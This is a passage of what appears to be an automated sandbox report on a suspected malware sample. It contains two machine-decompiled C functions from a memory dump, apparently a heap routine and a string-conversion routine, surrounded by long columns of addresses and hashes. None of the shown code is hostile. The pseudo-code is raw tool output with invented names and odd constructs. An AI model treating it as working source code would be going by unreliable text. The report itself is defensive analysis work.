                                                                                                                                                                                  0x3338e2ce
                                                                                                                                                                                  0x3338e2d4
                                                                                                                                                                                  0x3338e2d5
                                                                                                                                                                                  0x3338e2d6
                                                                                                                                                                                  0x3338e2d7
                                                                                                                                                                                  0x3338e2d8
                                                                                                                                                                                  0x3338e2d9
                                                                                                                                                                                  0x3338e2e5
                                                                                                                                                                                  0x3338e2e7
                                                                                                                                                                                  0x3338e2ed
                                                                                                                                                                                  0x3338e2f8
                                                                                                                                                                                  0x333c8e85
                                                                                                                                                                                  0x333c8e8a
                                                                                                                                                                                  0x333c8ea0
                                                                                                                                                                                  0x333c8ea5
                                                                                                                                                                                  0x333c8ea7
                                                                                                                                                                                  0x333c8eac
                                                                                                                                                                                  0x333c8eae
                                                                                                                                                                                  0x333c8eae
                                                                                                                                                                                  0x333c8eb5
                                                                                                                                                                                  0x333c8eb7
                                                                                                                                                                                  0x333c8eba
                                                                                                                                                                                  0x333c8ec0
                                                                                                                                                                                  0x333c8ec0
                                                                                                                                                                                  0x333c8ec6
                                                                                                                                                                                  0x333c8ec9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c8ecf
                                                                                                                                                                                  0x333c8ecf
                                                                                                                                                                                  0x333c8ed9
                                                                                                                                                                                  0x333c8ed9
                                                                                                                                                                                  0x333c8edc
                                                                                                                                                                                  0x333c8ede
                                                                                                                                                                                  0x333c8ee1
                                                                                                                                                                                  0x333c8ee7
                                                                                                                                                                                  0x333c8ee9
                                                                                                                                                                                  0x333c8eee
                                                                                                                                                                                  0x333c8ef2
                                                                                                                                                                                  0x333c8ef3
                                                                                                                                                                                  0x333c8efb
                                                                                                                                                                                  0x333c8efb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c8ee1
                                                                                                                                                                                  0x333c8ed1
                                                                                                                                                                                  0x333c8ed3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c8ed3
                                                                                                                                                                                  0x333c8ec9
                                                                                                                                                                                  0x333c8e8c
                                                                                                                                                                                  0x333c8e92
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c8e92
                                                                                                                                                                                  0x3338e2f8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338e2e7
                                                                                                                                                                                  0x3338e24c
                                                                                                                                                                                  0x3338e255
                                                                                                                                                                                  0x3338e261
                                                                                                                                                                                  0x3338e26d
                                                                                                                                                                                  0x3338e273
                                                                                                                                                                                  0x3338e27e
                                                                                                                                                                                  0x333c8e65
                                                                                                                                                                                  0x333c8e6a
                                                                                                                                                                                  0x333c8e7b
                                                                                                                                                                                  0x333c8e7b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c8e6a
                                                                                                                                                                                  0x3338e28f
                                                                                                                                                                                  0x3338e28f
                                                                                                                                                                                  0x3338e291
                                                                                                                                                                                  0x3338e297
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338e329
                                                                                                                                                                                  0x3338e329
                                                                                                                                                                                  0x3338e29d
                                                                                                                                                                                  0x3338e2a0
                                                                                                                                                                                  0x3338e2a2
                                                                                                                                                                                  0x3338e2a5
                                                                                                                                                                                  0x3338e2a8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338e2a8
                                                                                                                                                                                  0x3338e1e7
                                                                                                                                                                                  0x3338e1e7
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 69731f9d63fed1689301c66fafcf86acfa3cc109ba491b81ce492a167e125524
                                                                                                                                                                                  • Instruction ID: 3a807d5769413b4bec35ab3db3bef40aae891cb956556e4aa22ec20d38b56da8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 69731f9d63fed1689301c66fafcf86acfa3cc109ba491b81ce492a167e125524
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A815A75A01709EFEB11DFA8C880BDAB7F9FF48354F148429E555AB220DB30AD49CB61
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3341970B Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                                  			E3341970B(signed int __ecx, signed int __edx, signed int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				char* _t66;
				intOrPtr _t67;
				intOrPtr _t73;
				signed int _t81;
				signed int _t83;
				signed int _t86;
				signed int _t92;
				signed int _t94;
				void* _t95;
				signed int _t100;
				signed int _t107;
				signed int _t119;
				signed int _t121;
				signed int _t122;

				_t108 = __edx;
				_v8 =  *0x3344b370 ^ _t122;
				_t120 = _a8;
				_t119 = __ecx;
				_t86 = ( *(__ecx + 0xc) | __edx) & 0x93000f0b;
				if(_a8 <= 0x7fffffff) {
					_t108 = __ecx;
					__eflags = E33418435(__ecx + 0x18);
					if(__eflags == 0) {
						goto L1;
					}
					_t121 = _a4;
					_t108 = _t121;
					_v24 = _t121;
					_t62 = E33419955(__ecx, _t121, __eflags, _t120, _t86,  &_v44);
					__eflags = _t62;
					if(_t62 == 0) {
						L48:
						__eflags = _t121;
						L49:
						return E33394B50(_t121, _t86, _v8 ^ _t122, _t108, _t119, _t121);
					}
					__eflags = _v28 - _a8;
					if(_v28 < _a8) {
						goto L48;
					}
					_t108 = _v44;
					_t64 = 0;
					_v20 = _t108;
					__eflags = _a16;
					if(__eflags == 0) {
						_t92 = _a12;
						__eflags = _t92;
						if(_t92 != 0) {
							 *_t92 = _t108;
						}
						L13:
						__eflags = _t108 - _a8;
						if(_t108 == _a8) {
							L41:
							_t65 = L33363C40();
							__eflags = _t65;
							if(_t65 == 0) {
								_t66 = 0x7ffe0380;
							} else {
								_t66 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							__eflags =  *_t66;
							if( *_t66 != 0) {
								_t67 =  *[fs:0x30];
								__eflags =  *(_t67 + 0x240) & 0x00000001;
								if(( *(_t67 + 0x240) & 0x00000001) != 0) {
									__eflags = _t121;
									if(_t121 != 0) {
										_t108 = _t121;
										E3340F30A(_t119, _t121, _v24, _v44, _v32, 3);
									}
								}
							}
							goto L49;
						}
						_t94 = 0;
						_v16 = 0;
						__eflags = _t86 & 0x01000000;
						if((_t86 & 0x01000000) != 0) {
							L21:
							_t108 = _t86 & 0x12000001 | 0x01000000;
							_v12 = _t86 & 0x12000001 | 0x01000000;
							__eflags = _t121;
							if(__eflags != 0) {
								_t95 = 0;
								__eflags = 0;
								L25:
								__eflags = _t95 - 2;
								if(_t95 != 2) {
									__eflags = (_t95 + 2 << 7) + _t119;
									_t72 = E3341D4C6((_t95 + 2 << 7) + _t119, _t108, _t121,  &_v44);
									L28:
									__eflags = _v16;
									_t121 = _t72;
									if(_v16 == 0) {
										L34:
										__eflags = _t121;
										if(_t121 == 0) {
											goto L49;
										}
										__eflags = _t121 - 0xffffffff;
										if(_t121 == 0xffffffff) {
											goto L49;
										}
										_t73 = _v32;
										__eflags = _t86 & 0x00000002;
										if((_t86 & 0x00000002) != 0) {
											_t100 = _v20;
											__eflags = _t73 - _t100;
											if(_t73 > _t100) {
												__eflags = _t73 - _t100;
												E33398F40(_t100 + _t121, 0, _t73 - _t100);
												_t73 = _v32;
											}
										}
										__eflags = _t86 & 0x10000000;
										if((_t86 & 0x10000000) != 0) {
											 *((intOrPtr*)(_t73 + _t121)) = 0xabababab;
											 *((intOrPtr*)(_t73 + _t121 + 4)) = 0xabababab;
										}
										goto L41;
									}
									__eflags = _t121;
									if(__eflags == 0) {
										L32:
										_t72 = _v24;
										_v12 = _v24;
										L33:
										__eflags = E33418565(_t119, _t72, __eflags, _t86, 0) + 8;
										_t108 = _t119;
										E333F78DE(_v16, _t119, _v12, 6, E33418565(_t119, _t72, __eflags, _t86, 0) + 8);
										goto L34;
									}
									__eflags = _t121 - 0xffffffff;
									if(__eflags == 0) {
										goto L32;
									}
									_v12 = _t121;
									goto L33;
								}
								L26:
								_t108 = _v12;
								_t72 = E3341A6C0(_t119, _v12, _t121,  &_v44);
								goto L28;
							}
							_push(_t94);
							_t81 = E3341DE9F(_t86, 0x33446dc8, (_t121 -  *0x33446dc4 >> 0x14) + (_t121 -  *0x33446dc4 >> 0x14), _t119, _t121, __eflags);
							__eflags = _t81;
							if(_t81 == 0) {
								goto L26;
							} else {
								_t108 = _v12;
								_t26 = _t81 - 1; // -1
								_t95 = _t26;
								goto L25;
							}
						}
						__eflags =  *(_t119 + 0x10);
						if( *(_t119 + 0x10) == 0) {
							goto L21;
						}
						__eflags = _t64;
						if(__eflags != 0) {
							L18:
							__eflags = _t64 - 0xffffffff;
							if(_t64 == 0xffffffff) {
								goto L21;
							}
							_t94 =  *(_t64 + 2) & 0xf;
							__eflags = _t94;
							_v16 = _t94;
							if(_t94 == 0) {
								goto L21;
							}
							_t108 = _t119;
							_t83 = E333F78DE(_t94, _t119, _t121, 5, _t64 + 8);
							__eflags = _t83;
							if(_t83 < 0) {
								goto L48;
							}
							goto L21;
						}
						_t94 = _t119;
						_t64 = E33418565(_t94, _t121, __eflags, _t86, 0);
						__eflags = _t64;
						if(_t64 == 0) {
							goto L21;
						}
						goto L18;
					}
					_t64 = E33418565(_t119, _t121, __eflags, _t86, _a12);
					__eflags = 0;
					if(0 == 0) {
						L9:
						_t107 = 0;
						__eflags = 0;
						L10:
						 *_a16 = _t107;
						_t108 = _v20;
						goto L13;
					}
					__eflags = 0 - 0xffffffff;
					if(0 == 0xffffffff) {
						goto L9;
					} else {
						_t107 =  *0x00000000 & 0x0000ffff;
						goto L10;
					}
				}
				L1:
				_t121 = 0;
				goto L49;
			}
































                                                                                                                                                                                  0x3341970b
                                                                                                                                                                                  0x3341971a
                                                                                                                                                                                  0x3341971f
                                                                                                                                                                                  0x33419723
                                                                                                                                                                                  0x3341972a
                                                                                                                                                                                  0x33419736
                                                                                                                                                                                  0x33419742
                                                                                                                                                                                  0x3341974c
                                                                                                                                                                                  0x3341974e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33419758
                                                                                                                                                                                  0x3341975b
                                                                                                                                                                                  0x3341975d
                                                                                                                                                                                  0x33419760
                                                                                                                                                                                  0x33419765
                                                                                                                                                                                  0x33419767
                                                                                                                                                                                  0x3341993f
                                                                                                                                                                                  0x3341993f
                                                                                                                                                                                  0x33419942
                                                                                                                                                                                  0x33419952
                                                                                                                                                                                  0x33419952
                                                                                                                                                                                  0x33419770
                                                                                                                                                                                  0x33419773
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33419779
                                                                                                                                                                                  0x3341977c
                                                                                                                                                                                  0x3341977e
                                                                                                                                                                                  0x33419781
                                                                                                                                                                                  0x33419784
                                                                                                                                                                                  0x334197ae
                                                                                                                                                                                  0x334197b1
                                                                                                                                                                                  0x334197b3
                                                                                                                                                                                  0x334197b5
                                                                                                                                                                                  0x334197b5
                                                                                                                                                                                  0x334197b7
                                                                                                                                                                                  0x334197b7
                                                                                                                                                                                  0x334197ba
                                                                                                                                                                                  0x334198f3
                                                                                                                                                                                  0x334198f3
                                                                                                                                                                                  0x334198f8
                                                                                                                                                                                  0x334198fa
                                                                                                                                                                                  0x3341990c
                                                                                                                                                                                  0x334198fc
                                                                                                                                                                                  0x33419905
                                                                                                                                                                                  0x33419905
                                                                                                                                                                                  0x33419911
                                                                                                                                                                                  0x33419914
                                                                                                                                                                                  0x33419916
                                                                                                                                                                                  0x3341991c
                                                                                                                                                                                  0x33419923
                                                                                                                                                                                  0x33419925
                                                                                                                                                                                  0x33419927
                                                                                                                                                                                  0x3341992e
                                                                                                                                                                                  0x33419938
                                                                                                                                                                                  0x33419938
                                                                                                                                                                                  0x33419927
                                                                                                                                                                                  0x33419923
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33419914
                                                                                                                                                                                  0x334197c0
                                                                                                                                                                                  0x334197c2
                                                                                                                                                                                  0x334197c5
                                                                                                                                                                                  0x334197cb
                                                                                                                                                                                  0x3341980c
                                                                                                                                                                                  0x33419814
                                                                                                                                                                                  0x3341981a
                                                                                                                                                                                  0x3341981d
                                                                                                                                                                                  0x33419820
                                                                                                                                                                                  0x33419846
                                                                                                                                                                                  0x33419846
                                                                                                                                                                                  0x33419848
                                                                                                                                                                                  0x33419848
                                                                                                                                                                                  0x3341984b
                                                                                                                                                                                  0x33419869
                                                                                                                                                                                  0x3341986b
                                                                                                                                                                                  0x33419870
                                                                                                                                                                                  0x33419870
                                                                                                                                                                                  0x33419874
                                                                                                                                                                                  0x33419876
                                                                                                                                                                                  0x334198ab
                                                                                                                                                                                  0x334198ab
                                                                                                                                                                                  0x334198ad
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334198b3
                                                                                                                                                                                  0x334198b6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334198bc
                                                                                                                                                                                  0x334198bf
                                                                                                                                                                                  0x334198c2
                                                                                                                                                                                  0x334198c4
                                                                                                                                                                                  0x334198c7
                                                                                                                                                                                  0x334198c9
                                                                                                                                                                                  0x334198cb
                                                                                                                                                                                  0x334198d4
                                                                                                                                                                                  0x334198d9
                                                                                                                                                                                  0x334198dc
                                                                                                                                                                                  0x334198c9
                                                                                                                                                                                  0x334198df
                                                                                                                                                                                  0x334198e5
                                                                                                                                                                                  0x334198ec
                                                                                                                                                                                  0x334198ef
                                                                                                                                                                                  0x334198ef
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334198e5
                                                                                                                                                                                  0x33419878
                                                                                                                                                                                  0x3341987a
                                                                                                                                                                                  0x33419886
                                                                                                                                                                                  0x33419886
                                                                                                                                                                                  0x33419889
                                                                                                                                                                                  0x3341988c
                                                                                                                                                                                  0x3341989b
                                                                                                                                                                                  0x334198a4
                                                                                                                                                                                  0x334198a6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334198a6
                                                                                                                                                                                  0x3341987c
                                                                                                                                                                                  0x3341987f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33419881
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33419881
                                                                                                                                                                                  0x3341984d
                                                                                                                                                                                  0x3341984d
                                                                                                                                                                                  0x33419857
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33419857
                                                                                                                                                                                  0x3341982d
                                                                                                                                                                                  0x33419835
                                                                                                                                                                                  0x3341983a
                                                                                                                                                                                  0x3341983c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341983e
                                                                                                                                                                                  0x3341983e
                                                                                                                                                                                  0x33419841
                                                                                                                                                                                  0x33419841
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33419841
                                                                                                                                                                                  0x3341983c
                                                                                                                                                                                  0x334197cd
                                                                                                                                                                                  0x334197d0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334197d2
                                                                                                                                                                                  0x334197d4
                                                                                                                                                                                  0x334197e5
                                                                                                                                                                                  0x334197e5
                                                                                                                                                                                  0x334197e8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334197ee
                                                                                                                                                                                  0x334197ee
                                                                                                                                                                                  0x334197f1
                                                                                                                                                                                  0x334197f4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334197f9
                                                                                                                                                                                  0x334197ff
                                                                                                                                                                                  0x33419804
                                                                                                                                                                                  0x33419806
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33419806
                                                                                                                                                                                  0x334197da
                                                                                                                                                                                  0x334197dc
                                                                                                                                                                                  0x334197e1
                                                                                                                                                                                  0x334197e3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334197e3
                                                                                                                                                                                  0x3341978e
                                                                                                                                                                                  0x33419793
                                                                                                                                                                                  0x33419795
                                                                                                                                                                                  0x334197a1
                                                                                                                                                                                  0x334197a1
                                                                                                                                                                                  0x334197a1
                                                                                                                                                                                  0x334197a3
                                                                                                                                                                                  0x334197a6
                                                                                                                                                                                  0x334197a9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334197a9
                                                                                                                                                                                  0x33419797
                                                                                                                                                                                  0x3341979a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341979c
                                                                                                                                                                                  0x3341979c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341979c
                                                                                                                                                                                  0x3341979a
                                                                                                                                                                                  0x33419738
                                                                                                                                                                                  0x33419738
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f35b5ea132cb0ed68b14c8efada7b106eed0b8b5fdc07a6f81c39d0e737be4e9
                                                                                                                                                                                  • Instruction ID: be0df9186feef262e04956792335f7dbe128d7f1870dcf3275147e4c01a9cdef
                                                                                                                                                                                  • Opcode Fuzzy Hash: f35b5ea132cb0ed68b14c8efada7b106eed0b8b5fdc07a6f81c39d0e737be4e9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E61FC75F10B059BDB05CF64C980BBE77AAAF80354F584159E862973C4DB70D921C7D8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3336C560 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                                                  			E3336C560(signed short* _a4, signed short* _a8, char _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				void* _v29;
				signed int _v36;
				unsigned int _v40;
				intOrPtr _v44;
				signed short _v48;
				signed char* _v52;
				signed int _v56;
				signed short _v60;
				signed int _v64;
				unsigned int _v68;
				signed short _v72;
				intOrPtr _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				intOrPtr _t78;
				signed short _t79;
				signed short _t81;
				signed char _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t93;
				signed int _t96;
				signed int _t98;
				signed short* _t100;
				signed char* _t102;
				signed char* _t103;
				signed int _t104;
				signed int _t105;
				signed short _t106;
				signed short _t112;
				intOrPtr _t113;
				void* _t119;
				char _t120;
				signed int _t121;
				unsigned int _t122;
				unsigned int _t124;
				signed char* _t126;
				signed short* _t128;
				signed short _t129;
				signed int _t133;
				signed int _t135;
				intOrPtr _t137;
				signed int _t138;
				void* _t142;
				void* _t148;

				_push(0xfffffffe);
				_push(0x3342c248);
				_push(E3339AD20);
				_push( *[fs:0x0]);
				_t73 =  *0x3344b370;
				_v12 = _v12 ^ _t73;
				_push(_t73 ^ _t138);
				 *[fs:0x0] =  &_v20;
				_t100 = _a8;
				_t133 =  *_t100 & 0x0000ffff;
				_t126 = _t100[2];
				_t104 = 0;
				_t120 =  *0x33443921; // 0x0
				_v29 = _t120;
				if(_t120 != 0) {
					if(_t133 != 0) {
						L3337D210(0, 0,  &_v36, _t126, _t133);
						_t105 = _v36;
						L4:
						_t106 = _t105 + 2;
						if(_t106 > 0xfffe) {
							_t78 = 0xc00000f0;
							L17:
							 *[fs:0x0] = _v20;
							return _t78;
						}
						_t121 = _t106 & 0x0000ffff;
						_t9 = _t121 - 2; // 0x3fffffe
						_t79 = _t9;
						_t128 = _a4;
						 *_t128 = _t79;
						if(_a12 != 0) {
							_t128[1] = _t121;
							_t81 = L33365D90(_t106,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t106);
							_t128[2] = _t81;
							if(_t81 == 0) {
								_t78 = 0xc0000017;
								goto L17;
							}
							_t82 =  *0x33443921; // 0x0
							L9:
							_v44 = 0;
							_v8 = 0;
							_v76 = 1;
							_t135 =  *_t100 & 0x0000ffff;
							_v56 = _t135;
							_t102 = _t100[2];
							_v52 = _t102;
							_t122 =  *_t128 & 0x0000ffff;
							_t129 = _t128[2];
							_v48 = _t129;
							_t83 = _t82 & 0x000000ff;
							if(_t83 != 0) {
								if(_t135 != 0) {
									L3337D210(_t129, _t122,  &_v40, _t102, _t135);
								} else {
									_v40 = _t135;
								}
								L16:
								_v44 = 0;
								 *((short*)(_a4[2] + (_v40 >> 1) * 2)) = 0;
								_v44 = 0;
								_v8 = 0xfffffffe;
								_v76 = 0;
								E3336C6DB(_a4[2], _a4, 0);
								_t78 = 0;
								goto L17;
							}
							_t124 = _t122 >> 1;
							_v68 = _t124;
							_t148 =  *0x33446930 - _t83; // 0x0
							if(_t148 != 0) {
								_v72 = _t129;
								while(_t124 != 0 && _t135 != 0) {
									_t124 = _t124 - 1;
									_v68 = _t124;
									_t135 = _t135 - 1;
									_v56 = _t135;
									_t89 =  *_t102 & 0x000000ff;
									_v36 =  *(0x33444b00 + _t89 * 2) & 0x0000ffff;
									_t56 = _t129 + 2; // 0x3339ad22
									_t112 = _t56;
									_v60 = _t112;
									if(_v36 == 0) {
										_t113 =  *0x33446920; // 0x7ffb001c
										_t90 =  *((intOrPtr*)(_t113 + _t89 * 2));
										_t102 =  &(_t102[1]);
										L44:
										 *_t129 = _t90;
										_t129 = _v60;
										_v52 = _t102;
										_v48 = _t129;
										continue;
									}
									if(_t135 != 0) {
										_t103 =  &(_t102[1]);
										_v52 = _t103;
										_t93 =  *0x33446928; // 0x0
										_t90 =  *((intOrPtr*)(_t93 + (( *_t103 & 0x000000ff) + (_v36 & 0x0000ffff)) * 2));
										_t102 =  &(_t103[1]);
										_t135 = _t135 - 1;
										_v56 = _t135;
										goto L44;
									}
									 *_t129 = 0;
									_t129 = _t112;
									_v48 = _t129;
									break;
								}
								_v40 = _t129 - _v72;
								goto L16;
							}
							if(_t124 >= _t135) {
								_t124 = _t135;
							}
							_v40 = _t124 + _t124;
							_t137 =  *0x33446920; // 0x7ffb001c
							_t96 = 0;
							while(1) {
								_v64 = _t96;
								if(_t96 >= _t124) {
									goto L16;
								}
								 *((short*)(_t129 + _t96 * 2)) =  *((intOrPtr*)(_t137 + (_t102[_t96] & 0x000000ff) * 2));
								_t96 = _t96 + 1;
							}
							goto L16;
						}
						_t119 = (_t79 & 0x0000ffff) + 2;
						if(_t119 > (_t128[1] & 0x0000ffff) || _t119 < 2) {
							_t78 = 0x80000005;
							goto L17;
						} else {
							_t82 = _v29;
							goto L9;
						}
					}
					_t105 = 0;
					L3:
					_v36 = _t105;
					goto L4;
				}
				_t142 =  *0x33446930 - _t104; // 0x0
				if(_t142 != 0) {
					if(_t133 == 0) {
						goto L3;
					} else {
						goto L25;
					}
					do {
						L25:
						_t133 = _t133 - 1;
						_t98 =  *_t126 & 0x000000ff;
						_t126 =  &(_t126[1]);
						if( *((short*)(0x33444b00 + _t98 * 2)) == 0) {
							goto L28;
						}
						if(_t133 == 0) {
							_t105 = _t104 + 2;
							goto L3;
						}
						_t133 = _t133 - 1;
						_t126 =  &(_t126[1]);
						L28:
						_t104 = _t104 + 2;
					} while (_t133 != 0);
					goto L3;
				}
				_t105 = _t133 + _t133;
				goto L3;
			}






















































                                                                                                                                                                                  0x3336c565
                                                                                                                                                                                  0x3336c567
                                                                                                                                                                                  0x3336c56c
                                                                                                                                                                                  0x3336c577
                                                                                                                                                                                  0x3336c57e
                                                                                                                                                                                  0x3336c583
                                                                                                                                                                                  0x3336c588
                                                                                                                                                                                  0x3336c58c
                                                                                                                                                                                  0x3336c592
                                                                                                                                                                                  0x3336c595
                                                                                                                                                                                  0x3336c598
                                                                                                                                                                                  0x3336c59b
                                                                                                                                                                                  0x3336c59d
                                                                                                                                                                                  0x3336c5a3
                                                                                                                                                                                  0x3336c5a8
                                                                                                                                                                                  0x333b8b39
                                                                                                                                                                                  0x333b8b4c
                                                                                                                                                                                  0x333b8b51
                                                                                                                                                                                  0x3336c5c0
                                                                                                                                                                                  0x3336c5c0
                                                                                                                                                                                  0x3336c5c9
                                                                                                                                                                                  0x333b8b8b
                                                                                                                                                                                  0x3336c6a1
                                                                                                                                                                                  0x3336c6a4
                                                                                                                                                                                  0x3336c6b2
                                                                                                                                                                                  0x3336c6b2
                                                                                                                                                                                  0x3336c5cf
                                                                                                                                                                                  0x3336c5d2
                                                                                                                                                                                  0x3336c5d2
                                                                                                                                                                                  0x3336c5d5
                                                                                                                                                                                  0x3336c5d8
                                                                                                                                                                                  0x3336c5df
                                                                                                                                                                                  0x3336c6b5
                                                                                                                                                                                  0x3336c6c5
                                                                                                                                                                                  0x3336c6ca
                                                                                                                                                                                  0x3336c6cf
                                                                                                                                                                                  0x3336c6ee
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336c6ee
                                                                                                                                                                                  0x3336c6d1
                                                                                                                                                                                  0x3336c603
                                                                                                                                                                                  0x3336c603
                                                                                                                                                                                  0x3336c60a
                                                                                                                                                                                  0x3336c611
                                                                                                                                                                                  0x3336c618
                                                                                                                                                                                  0x3336c61b
                                                                                                                                                                                  0x3336c61e
                                                                                                                                                                                  0x3336c621
                                                                                                                                                                                  0x3336c624
                                                                                                                                                                                  0x3336c627
                                                                                                                                                                                  0x3336c62a
                                                                                                                                                                                  0x3336c62d
                                                                                                                                                                                  0x3336c632
                                                                                                                                                                                  0x333b8b97
                                                                                                                                                                                  0x333b8ba9
                                                                                                                                                                                  0x333b8b99
                                                                                                                                                                                  0x333b8b99
                                                                                                                                                                                  0x333b8b99
                                                                                                                                                                                  0x3336c673
                                                                                                                                                                                  0x3336c673
                                                                                                                                                                                  0x3336c687
                                                                                                                                                                                  0x3336c68d
                                                                                                                                                                                  0x3336c690
                                                                                                                                                                                  0x3336c697
                                                                                                                                                                                  0x3336c69a
                                                                                                                                                                                  0x3336c69f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336c69f
                                                                                                                                                                                  0x3336c638
                                                                                                                                                                                  0x3336c63a
                                                                                                                                                                                  0x3336c63d
                                                                                                                                                                                  0x3336c643
                                                                                                                                                                                  0x333b8bb3
                                                                                                                                                                                  0x333b8bb6
                                                                                                                                                                                  0x333b8bbe
                                                                                                                                                                                  0x333b8bbf
                                                                                                                                                                                  0x333b8bc2
                                                                                                                                                                                  0x333b8bc3
                                                                                                                                                                                  0x333b8bc6
                                                                                                                                                                                  0x333b8bd1
                                                                                                                                                                                  0x333b8bd4
                                                                                                                                                                                  0x333b8bd4
                                                                                                                                                                                  0x333b8bd7
                                                                                                                                                                                  0x333b8bdf
                                                                                                                                                                                  0x333b8c1b
                                                                                                                                                                                  0x333b8c21
                                                                                                                                                                                  0x333b8c25
                                                                                                                                                                                  0x333b8c26
                                                                                                                                                                                  0x333b8c26
                                                                                                                                                                                  0x333b8c29
                                                                                                                                                                                  0x333b8c2c
                                                                                                                                                                                  0x333b8c2f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b8c2f
                                                                                                                                                                                  0x333b8be3
                                                                                                                                                                                  0x333b8c02
                                                                                                                                                                                  0x333b8c03
                                                                                                                                                                                  0x333b8c0b
                                                                                                                                                                                  0x333b8c10
                                                                                                                                                                                  0x333b8c14
                                                                                                                                                                                  0x333b8c15
                                                                                                                                                                                  0x333b8c16
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b8c16
                                                                                                                                                                                  0x333b8be7
                                                                                                                                                                                  0x333b8bea
                                                                                                                                                                                  0x333b8bec
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b8bec
                                                                                                                                                                                  0x333b8bf5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b8bf5
                                                                                                                                                                                  0x3336c64b
                                                                                                                                                                                  0x3336c64d
                                                                                                                                                                                  0x3336c64d
